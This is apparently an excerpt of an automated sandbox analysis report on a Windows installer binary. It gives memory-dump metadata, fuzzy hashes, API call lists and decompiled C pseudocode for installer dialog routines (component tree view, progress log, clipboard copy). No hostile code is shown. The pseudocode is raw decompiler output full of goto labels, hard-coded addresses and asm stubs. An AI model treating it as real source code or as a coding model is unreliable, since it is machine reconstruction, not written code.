            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: FileRead
            • String ID:
            • API String ID: 2738559852-0
            • Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
            • Instruction ID: 4fd4a8308e5d5898c176f95433ccaa972cd52e025ae54bcd1c8d1e1e5a7d5bbe
            • Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
            • Instruction Fuzzy Hash: FEE08C32611219BFCF105E559C01EE73F6CEB043A2F00C032F919E5190D630EA14EBA8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004030FF(long _a4) {
            				long _t2;
            
            				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
            				return _t2;
            			}


            APIs
            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2A,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 0040310D
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: FilePointer
            • String ID:
            • API String ID: 973152223-0
            • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
            • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
            • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
            • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            C-Code - Quality: 93%
            			E004046A7(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
            				struct HWND__* _v8;
            				struct HWND__* _v12;
            				signed int _v16;
            				intOrPtr _v20;
            				struct HBITMAP__* _v24;
            				long _v28;
            				int _v32;
            				signed int _v40;
            				int _v44;
            				signed int* _v56;
            				intOrPtr _v60;
            				signed int _v64;
            				long _v68;
            				void* _v72;
            				intOrPtr _v76;
            				intOrPtr _v80;
            				void* _v84;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				struct HWND__* _t182;
            				int _t196;
            				long _t202;
            				signed int _t206;
            				signed int _t217;
            				void* _t220;
            				void* _t221;
            				int _t227;
            				signed int _t232;
            				signed int _t233;
            				signed int _t240;
            				void* _t252;
            				intOrPtr _t258;
            				char* _t268;
            				signed char _t269;
            				long _t274;
            				int _t280;
            				signed int* _t281;
            				int _t282;
            				long _t283;
            				int _t285;
            				long _t286;
            				signed int _t287;
            				long _t288;
            				signed int _t291;
            				signed int _t298;
            				signed int _t300;
            				signed int _t302;
            				int* _t310;
            				void* _t311;
            				int _t315;
            				int _t316;
            				int _t317;
            				signed int _t318;
            				void* _t320;
            
            				_v12 = GetDlgItem(_a4, 0x3f9);
            				_t182 = GetDlgItem(_a4, 0x408);
            				_t280 =  *0x7a2fa8;
            				_t320 = SendMessageA;
            				_v8 = _t182;
            				_t315 = 0;
            				_v32 = _t280;
            				_v20 =  *0x7a2f88 + 0x94;
            				if(_a8 != 0x110) {
            					L23:
            					if(_a8 != 0x405) {
            						_t289 = _a16;
            					} else {
            						_a12 = _t315;
            						_t289 = 1;
            						_a8 = 0x40f;
            						_a16 = 1;
            					}
            					if(_a8 == 0x4e || _a8 == 0x413) {
            						_v16 = _t289;
            						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
            							if(( *0x7a2f91 & 0x00000002) != 0) {
            								L41:
            								if(_v16 != _t315) {
            									_t232 = _v16;
            									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
            										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
            									}
            									_t233 = _v16;
            									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
            										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
            											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
            										} else {
            											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
            										}
            									}
            								}
            								goto L48;
            							}
            							if(_a8 == 0x413) {
            								L33:
            								_t289 = 0 | _a8 != 0x00000413;
            								_t240 = E00404627(_v8, _a8 != 0x413);
            								if(_t240 >= _t315) {
            									_t93 = _t280 + 8; // 0x8
            									_t310 = _t240 * 0x418 + _t93;
            									_t289 =  *_t310;
            									if((_t289 & 0x00000010) == 0) {
            										if((_t289 & 0x00000040) == 0) {
            											_t298 = _t289 ^ 0x00000001;
            										} else {
            											_t300 = _t289 ^ 0x00000080;
            											if(_t300 >= 0) {
            												_t298 = _t300 & 0xfffffffe;
            											} else {
            												_t298 = _t300 | 0x00000001;
            											}
            										}
            										 *_t310 = _t298;
            										E0040117D(_t240);
            										_t289 = 1;
            										_a8 = 0x40f;
            										_a12 = 1;
            										_a16 =  !( *0x7a2f90) >> 0x00000008 & 1;
            									}
            								}
            								goto L41;
            							}
            							_t289 = _a16;
            							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
            								goto L41;
            							}
            							goto L33;
            						} else {
            							goto L48;
            						}
            					} else {
            						L48:
            						if(_a8 != 0x111) {
            							L56:
            							if(_a8 == 0x200) {
            								SendMessageA(_v8, 0x200, _t315, _t315);
            							}
            							if(_a8 == 0x40b) {
            								_t220 =  *0x79f564;
            								if(_t220 != _t315) {
            									ImageList_Destroy(_t220);
            								}
            								_t221 =  *0x79f578;
            								if(_t221 != _t315) {
            									GlobalFree(_t221);
            								}
            								 *0x79f564 = _t315;
            								 *0x79f578 = _t315;
            								 *0x7a2fe0 = _t315;
            							}
            							if(_a8 != 0x40f) {
            								L86:
            								if(_a8 == 0x420 && ( *0x7a2f91 & 0x00000001) != 0) {
            									_t316 = (0 | _a16 == 0x00000020) << 3;
            									ShowWindow(_v8, _t316);
            									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
            								}
            								goto L89;
            							} else {
            								E004011EF(_t289, _t315, _t315);
            								if(_a12 != _t315) {
            									E00401410(8);
            								}
            								if(_a16 == _t315) {
            									L73:
            									E004011EF(_t289, _t315, _t315);
            									_v32 =  *0x79f578;
            									_t196 =  *0x7a2fa8;
            									_v60 = 0xf030;
            									_v16 = _t315;
            									if( *0x7a2fac <= _t315) {
            										L84:
            										InvalidateRect(_v8, _t315, 1);
            										if( *((intOrPtr*)( *0x7a275c + 0x10)) != _t315) {
            											E00404545(0x3ff, 0xfffffffb, E004045FA(5));
            										}
            										goto L86;
            									}
            									_t281 = _t196 + 8;
            									do {
            										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
            										if(_t202 != _t315) {
            											_t291 =  *_t281;
            											_v68 = _t202;
            											_v72 = 8;
            											if((_t291 & 0x00000001) != 0) {
            												_v72 = 9;
            												_v56 =  &(_t281[4]);
            												_t281[0] = _t281[0] & 0x000000fe;
            											}
            											if((_t291 & 0x00000040) == 0) {
            												_t206 = (_t291 & 0x00000001) + 1;
            												if((_t291 & 0x00000010) != 0) {
            													_t206 = _t206 + 3;
            												}
            											} else {
            												_t206 = 3;
            											}
            											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
            											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
            											SendMessageA(_v8, 0x110d, _t315,  &_v72);
            										}
            										_v16 = _v16 + 1;
            										_t281 =  &(_t281[0x106]);
            									} while (_v16 <  *0x7a2fac);
            									goto L84;
            								} else {
            									_t282 = E004012E2( *0x79f578);
            									E00401299(_t282);
            									_t217 = 0;
            									_t289 = 0;
            									if(_t282 <= _t315) {
            										L72:
            										SendMessageA(_v12, 0x14e, _t289, _t315);
            										_a16 = _t282;
            										_a8 = 0x420;
            										goto L73;
            									} else {
            										goto L69;
            									}
            									do {
            										L69:
            										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
            											_t289 = _t289 + 1;
            										}
            										_t217 = _t217 + 1;
            									} while (_t217 < _t282);
            									goto L72;
            								}
            							}
            						}
            						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
            							goto L89;
            						} else {
            							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
            							if(_t227 == 0xffffffff) {
            								goto L89;
            							}
            							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
            							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
            								_t283 = 0x20;
            							}
            							E00401299(_t283);
            							SendMessageA(_a4, 0x420, _t315, _t283);
            							_a12 = 1;
            							_a16 = _t315;
            							_a8 = 0x40f;
            							goto L56;
            						}
            					}
            				} else {
            					 *0x7a2fe0 = _a4;
            					_t285 = 2;
            					_v28 = 0;
            					_v16 = _t285;
            					 *0x79f578 = GlobalAlloc(0x40,  *0x7a2fac << 2);
            					_v24 = LoadBitmapA( *0x7a2f80, 0x6e);
            					 *0x79f574 = SetWindowLongA(_v8, 0xfffffffc, E00404CA1);
            					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
            					 *0x79f564 = _t252;
            					ImageList_AddMasked(_t252, _v24, 0xff00ff);
            					SendMessageA(_v8, 0x1109, _t285,  *0x79f564);
            					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
            						SendMessageA(_v8, 0x111b, 0x10, 0);
            					}
            					DeleteObject(_v24);
            					_t286 = 0;
            					do {
            						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
            						if(_t258 != _t315) {
            							if(_t286 != 0x20) {
            								_v16 = _t315;
            							}
            							_push(_t258);
            							_push(_t315);
            							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059E1(_t286, _t315, _t320)), _t286);
            						}
            						_t286 = _t286 + 1;
            					} while (_t286 < 0x21);
            					_t317 = _a16;
            					_t287 = _v16;
            					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
            					_push(0x15);
            					E00403DA7(_a4);
            					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
            					_push(0x16);
            					E00403DA7(_a4);
            					_t318 = 0;
            					_t288 = 0;
            					if( *0x7a2fac <= 0) {
            						L19:
            						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
            						goto L20;
            					} else {
            						_t311 = _v32 + 8;
            						_v24 = _t311;
            						do {
            							_t268 = _t311 + 0x10;
            							if( *_t268 != 0) {
            								_v60 = _t268;
            								_t269 =  *_t311;
            								_t302 = 0x20;
            								_v84 = _t288;
            								_v80 = 0xffff0002;
            								_v76 = 0xd;
            								_v64 = _t302;
            								_v40 = _t318;
            								_v68 = _t269 & _t302;
            								if((_t269 & 0x00000002) == 0) {
            									if((_t269 & 0x00000004) == 0) {
            										 *( *0x79f578 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
            									} else {
            										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
            									}
            								} else {
            									_v76 = 0x4d;
            									_v44 = 1;
            									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
            									_v28 = 1;
            									 *( *0x79f578 + _t318 * 4) = _t274;
            									_t288 =  *( *0x79f578 + _t318 * 4);
            								}
            							}
            							_t318 = _t318 + 1;
            							_t311 = _v24 + 0x418;
            							_v24 = _t311;
            						} while (_t318 <  *0x7a2fac);
            						if(_v28 != 0) {
            							L20:
            							if(_v16 != 0) {
            								E00403DDC(_v8);
            								_t280 = _v32;
            								_t315 = 0;
            								goto L23;
            							} else {
            								ShowWindow(_v12, 5);
            								E00403DDC(_v12);
            								L89:
            								return E00403E0E(_a8, _a12, _a16);
            							}
            						}
            						goto L19;
            					}
            				}
            			}

            0x004046c5
            0x004046cb
            0x004046cd
            0x004046d3
            0x004046d9
            0x004046e6
            0x004046ef
            0x004046f2
            0x004046f5
            0x00404916
            0x0040491d
            0x00404931
            0x0040491f
            0x00404921
            0x00404924
            0x00404925
            0x0040492c
            0x0040492c
            0x0040493d
            0x0040494b
            0x0040494e
            0x00404964
            0x004049dc
            0x004049df
            0x004049e1
            0x004049eb
            0x004049f9
            0x004049f9
            0x004049fb
            0x00404a05
            0x00404a0b
            0x00404a2c
            0x00404a0d
            0x00404a1a
            0x00404a1a
            0x00404a0b
            0x00404a05
            0x00000000
            0x004049df
            0x00404969
            0x00404974
            0x00404979
            0x00404980
            0x00404987
            0x00404991
            0x00404991
            0x00404995
            0x0040499a
            0x0040499f
            0x004049b5
            0x004049a1
            0x004049a1
            0x004049a9
            0x004049b0
            0x004049ab
            0x004049ab
            0x004049ab
            0x004049a9
            0x004049b9
            0x004049bb
            0x004049c9
            0x004049ca
            0x004049d6
            0x004049d9
            0x004049d9
            0x0040499a
            0x00000000
            0x00404987
            0x0040496b
            0x00404972
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00404a2f
            0x00404a2f
            0x00404a36
            0x00404aaa
            0x00404ab1
            0x00404abd
            0x00404abd
            0x00404ac6
            0x00404ac8
            0x00404acf
            0x00404ad2
            0x00404ad2
            0x00404ad8
            0x00404adf
            0x00404ae2
            0x00404ae2
            0x00404ae8
            0x00404aee
            0x00404af4
            0x00404af4
            0x00404b01
            0x00404c4e
            0x00404c55
            0x00404c72
            0x00404c78
            0x00404c8a
            0x00404c8a
            0x00000000
            0x00404b07
            0x00404b09
            0x00404b11
            0x00404b15
            0x00404b15
            0x00404b1d
            0x00404b5e
            0x00404b60
            0x00404b70
            0x00404b73
            0x00404b78
            0x00404b7f
            0x00404b82
            0x00404c24
            0x00404c2a
            0x00404c38
            0x00404c49
            0x00404c49
            0x00000000
            0x00404c38
            0x00404b88
            0x00404b8b
            0x00404b91
            0x00404b96
            0x00404b98
            0x00404b9a
            0x00404ba0
            0x00404ba7
            0x00404bac
            0x00404bb3
            0x00404bb6
            0x00404bb6
            0x00404bbd
            0x00404bc9
            0x00404bcd
            0x00404bcf
            0x00404bcf
            0x00404bbf
            0x00404bc1
            0x00404bc1
            0x00404bef
            0x00404bfb
            0x00404c0a
            0x00404c0a
            0x00404c0c
            0x00404c0f
            0x00404c18
            0x00000000
            0x00404b1f
            0x00404b2a
            0x00404b2d
            0x00404b32
            0x00404b34
            0x00404b38
            0x00404b48
            0x00404b52
            0x00404b54
            0x00404b57
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00404b3a
            0x00404b3a
            0x00404b40
            0x00404b42
            0x00404b42
            0x00404b43
            0x00404b44
            0x00000000
            0x00404b3a
            0x00404b1d
            0x00404b01
            0x00404a3e
            0x00000000
            0x00404a54
            0x00404a5e
            0x00404a63
            0x00000000
            0x00000000
            0x00404a75
            0x00404a7a
            0x00404a86
            0x00404a86
            0x00404a88
            0x00404a97
            0x00404a99
            0x00404aa0
            0x00404aa3
            0x00000000
            0x00404aa3
            0x00404a3e
            0x004046fb
            0x00404700
            0x0040470a
            0x0040470b
            0x00404714
            0x0040471f
            0x0040473a
            0x0040474c
            0x00404751
            0x0040475c
            0x00404765
            0x0040477a
            0x0040478b
            0x00404798
            0x00404798
            0x0040479d
            0x004047a3
            0x004047a5
            0x004047a8
            0x004047ad
            0x004047b2
            0x004047b4
            0x004047b4
            0x004047b7
            0x004047b8
            0x004047d4
            0x004047d4
            0x004047d6
            0x004047d7
            0x004047dc
            0x004047df
            0x004047e2
            0x004047e6
            0x004047eb
            0x004047f0
            0x004047f4
            0x004047f9
            0x004047fe
            0x00404800
            0x00404808
            0x004048d2
            0x004048e5
            0x00000000
            0x0040480e
            0x00404811
            0x00404814
            0x00404817
            0x00404817
            0x0040481d
            0x00404823
            0x00404826
            0x0040482c
            0x0040482d
            0x00404832
            0x0040483b
            0x00404842
            0x00404845
            0x00404848
            0x0040484b
            0x00404887
            0x004048b0
            0x00404889
            0x00404896
            0x00404896
            0x0040484d
            0x00404850
            0x0040485f
            0x00404869
            0x00404871
            0x00404878
            0x00404880
            0x00404880
            0x0040484b
            0x004048b6
            0x004048b7
            0x004048c3
            0x004048c3
            0x004048d0
            0x004048eb
            0x004048ef
            0x0040490c
            0x00404911
            0x00404914
            0x00000000
            0x004048f1
            0x004048f6
            0x004048ff
            0x00404c8c
            0x00404c9e
            0x00404c9e
            0x004048ef
            0x00000000
            0x004048d0
            0x00404808

            APIs
            • GetDlgItem.USER32 ref: 004046BE
            • GetDlgItem.USER32 ref: 004046CB
            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404717
            • LoadBitmapA.USER32 ref: 0040472A
            • SetWindowLongA.USER32 ref: 0040473D
            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404751
            • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404765
            • SendMessageA.USER32(?,00001109,00000002), ref: 0040477A
            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404786
            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404798
            • DeleteObject.GDI32(?), ref: 0040479D
            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047C8
            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047D4
            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404869
            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404894
            • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048A8
            • GetWindowLongA.USER32 ref: 004048D7
            • SetWindowLongA.USER32 ref: 004048E5
            • ShowWindow.USER32(?,00000005), ref: 004048F6
            • SendMessageA.USER32(?,00000419,00000000,?), ref: 004049F9
            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A5E
            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A73
            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A97
            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404ABD
            • ImageList_Destroy.COMCTL32(?), ref: 00404AD2
            • GlobalFree.KERNEL32 ref: 00404AE2
            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B52
            • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404BFB
            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C0A
            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C2A
            • ShowWindow.USER32(?,00000000), ref: 00404C78
            • GetDlgItem.USER32 ref: 00404C83
            • ShowWindow.USER32(00000000), ref: 00404C8A
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
            • String ID: $M$N
            • API String ID: 1638840714-813528018
            • Opcode ID: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
            • Instruction ID: 9804f70a80ad740571f010f4d41a056d70bc73ca34169b501aedef0055c070ba
            • Opcode Fuzzy Hash: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
            • Instruction Fuzzy Hash: 3C029EB0D00208EFEB10DF64CD45AAE7BB5EB84315F10817AF610BA2E1C7799A52CF58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 89%
            			E00404EA0(long _a4, long _a8, long _a12, unsigned int _a16) {
            				struct HWND__* _v8;
            				struct tagRECT _v24;
            				void* _v32;
            				signed int _v36;
            				int _v40;
            				CHAR* _v44;
            				signed int _v48;
            				int _v52;
            				void* _v56;
            				void* _v64;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				long _t86;
            				struct HMENU__* _t88;
            				unsigned int _t91;
            				int _t93;
            				int _t94;
            				void* _t100;
            				intOrPtr _t123;
            				struct HWND__* _t127;
            				int _t148;
            				int _t149;
            				struct HWND__* _t153;
            				struct HWND__* _t157;
            				struct HMENU__* _t159;
            				long _t161;
            				CHAR* _t162;
            				CHAR* _t163;
            
            				_t153 =  *0x7a2764;
            				_t148 = 0;
            				_v8 = _t153;
            				if(_a8 != 0x110) {
            					if(_a8 == 0x405) {
            						CloseHandle(CreateThread(0, 0, E00404E34, GetDlgItem(_a4, 0x3ec), 0,  &_a4));
            					}
            					if(_a8 != 0x111) {
            						L16:
            						if(_a8 != 0x404) {
            							L24:
            							if(_a8 != 0x7b || _a12 != _t153) {
            								goto L19;
            							} else {
            								_t86 = SendMessageA(_t153, 0x1004, _t148, _t148);
            								_a8 = _t86;
            								if(_t86 <= _t148) {
            									L36:
            									return 0;
            								}
            								_t88 = CreatePopupMenu();
            								_push(0xffffffe1);
            								_push(_t148);
            								_t159 = _t88;
            								AppendMenuA(_t159, _t148, 1, E004059E1(_t148, _t153, _t159));
            								_t91 = _a16;
            								if(_t91 != 0xffffffff) {
            									_t149 = _t91;
            									_t93 = _t91 >> 0x10;
            								} else {
            									GetWindowRect(_t153,  &_v24);
            									_t149 = _v24.left;
            									_t93 = _v24.top;
            								}
            								_t94 = TrackPopupMenu(_t159, 0x180, _t149, _t93, _t148, _t153, _t148);
            								_t161 = 1;
            								if(_t94 == 1) {
            									_v56 = _t148;
            									_v44 = 0x79f580;
            									_v40 = 0xfff;
            									_a4 = _a8;
            									do {
            										_a4 = _a4 - 1;
            										_t161 = _t161 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
            									} while (_a4 != _t148);
            									OpenClipboard(_t148);
            									EmptyClipboard();
            									_t100 = GlobalAlloc(0x42, _t161);
            									_a4 = _t100;
            									_t162 = GlobalLock(_t100);
            									do {
            										_v44 = _t162;
            										SendMessageA(_v8, 0x102d, _t148,  &_v64);
            										_t163 =  &(_t162[lstrlenA(_t162)]);
            										 *_t163 = 0xa0d;
            										_t162 =  &(_t163[2]);
            										_t148 = _t148 + 1;
            									} while (_t148 < _a8);
            									GlobalUnlock(_a4);
            									SetClipboardData(1, _a4);
            									CloseClipboard();
            								}
            								goto L36;
            							}
            						}
            						if( *0x7a274c == _t148) {
            							ShowWindow( *0x7a2f84, 8);
            							if( *0x7a300c == _t148) {
            								E00404D62( *((intOrPtr*)( *0x79ed58 + 0x34)), _t148);
            							}
            							E00403D80(1);
            							goto L24;
            						}
            						 *0x79e950 = 2;
            						E00403D80(0x78);
            						goto L19;
            					} else {
            						if(_a12 != 0x403) {
            							L19:
            							return E00403E0E(_a8, _a12, _a16);
            						}
            						ShowWindow( *0x7a2750, _t148);
            						ShowWindow(_t153, 8);
            						E0040417A();
            						goto L16;
            					}
            				}
            				_v48 = _v48 | 0xffffffff;
            				_v36 = _v36 | 0xffffffff;
            				_v56 = 2;
            				_v52 = 0;
            				_v44 = 0;
            				_v40 = 0;
            				asm("stosd");
            				asm("stosd");
            				_t123 =  *0x7a2f88;
            				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
            				_a12 =  *((intOrPtr*)(_t123 + 0x60));
            				 *0x7a2750 = GetDlgItem(_a4, 0x403);
            				 *0x7a2748 = GetDlgItem(_a4, 0x3ee);
            				_t127 = GetDlgItem(_a4, 0x3f8);
            				 *0x7a2764 = _t127;
            				_v8 = _t127;
            				E00403DDC( *0x7a2750);
            				 *0x7a2754 = E004045FA(4);
            				 *0x7a276c = 0;
            				GetClientRect(_v8,  &_v24);
            				_v48 = _v24.right - GetSystemMetrics(0x15);
            				SendMessageA(_v8, 0x101b, 0,  &_v56);
            				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
            				if(_a8 >= 0) {
            					SendMessageA(_v8, 0x1001, 0, _a8);
            					SendMessageA(_v8, 0x1026, 0, _a8);
            				}
            				if(_a12 >= _t148) {
            					SendMessageA(_v8, 0x1024, _t148, _a12);
            				}
            				_push( *((intOrPtr*)(_a16 + 0x30)));
            				_push(0x1b);
            				E00403DA7(_a4);
            				if(( *0x7a2f90 & 0x00000003) != 0) {
            					ShowWindow( *0x7a2750, _t148);
            					if(( *0x7a2f90 & 0x00000002) != 0) {
            						 *0x7a2750 = _t148;
            					} else {
            						ShowWindow(_v8, 8);
            					}
            				}
            				_t157 = GetDlgItem(_a4, 0x3ec);
            				SendMessageA(_t157, 0x401, _t148, 0x75300000);
            				if(( *0x7a2f90 & 0x00000004) != 0) {
            					SendMessageA(_t157, 0x409, _t148, _a12);
            					SendMessageA(_t157, 0x2001, _t148, _a8);
            				}
            				goto L36;
            			}

            0x00404ea9
            0x00404eaf
            0x00404eb8
            0x00404ebb
            0x00405048
            0x0040506c
            0x0040506c
            0x0040507f
            0x0040509c
            0x004050a3
            0x004050fa
            0x004050fe
            0x00000000
            0x00405105
            0x0040510d
            0x00405115
            0x00405118
            0x00405215
            0x00000000
            0x00405215
            0x0040511e
            0x00405124
            0x00405126
            0x00405127
            0x00405133
            0x00405139
            0x0040513f
            0x00405154
            0x0040515a
            0x00405141
            0x00405146
            0x0040514c
            0x0040514f
            0x0040514f
            0x00405168
            0x00405170
            0x00405173
            0x0040517c
            0x0040517f
            0x00405186
            0x0040518d
            0x00405195
            0x00405195
            0x004051ac
            0x004051ac
            0x004051b3
            0x004051b9
            0x004051c2
            0x004051c9
            0x004051d2
            0x004051d4
            0x004051d7
            0x004051e0
            0x004051ec
            0x004051ee
            0x004051f4
            0x004051f5
            0x004051f6
            0x004051fe
            0x00405209
            0x0040520f
            0x0040520f
            0x00000000
            0x00405173
            0x004050fe
            0x004050ab
            0x004050db
            0x004050e3
            0x004050ee
            0x004050ee
            0x004050f5
            0x00000000
            0x004050f5
            0x004050af
            0x004050b9
            0x00000000
            0x00405081
            0x00405087
            0x004050be
            0x00000000
            0x004050c7
            0x00405090
            0x00405095
            0x00405097
            0x00000000
            0x00405097
            0x0040507f
            0x00404ec1
            0x00404ec5
            0x00404ece
            0x00404ed5
            0x00404ed8
            0x00404edb
            0x00404ede
            0x00404edf
            0x00404ee0
            0x00404ef9
            0x00404efc
            0x00404f06
            0x00404f15
            0x00404f1d
            0x00404f25
            0x00404f2a
            0x00404f2d
            0x00404f39
            0x00404f42
            0x00404f4b
            0x00404f6e
            0x00404f74
            0x00404f85
            0x00404f8a
            0x00404f98
            0x00404fa6
            0x00404fa6
            0x00404fab
            0x00404fb9
            0x00404fb9
            0x00404fbe
            0x00404fc1
            0x00404fc6
            0x00404fd2
            0x00404fdb
            0x00404fe8
            0x00404ff7
            0x00404fea
            0x00404fef
            0x00404fef
            0x00404fe8
            0x0040500c
            0x00405015
            0x0040501e
            0x0040502e
            0x0040503a
            0x0040503a
            0x00000000

            APIs
            • GetDlgItem.USER32 ref: 00404EFF
            • GetDlgItem.USER32 ref: 00404F0E
            • GetDlgItem.USER32 ref: 00404F1D
              • Part of subcall function 00403DDC: SendMessageA.USER32(00000028,?,00000001,00403C0F), ref: 00403DEA
            • GetClientRect.USER32 ref: 00404F4B
            • GetSystemMetrics.USER32 ref: 00404F53
            • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F74
            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F85
            • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404F98
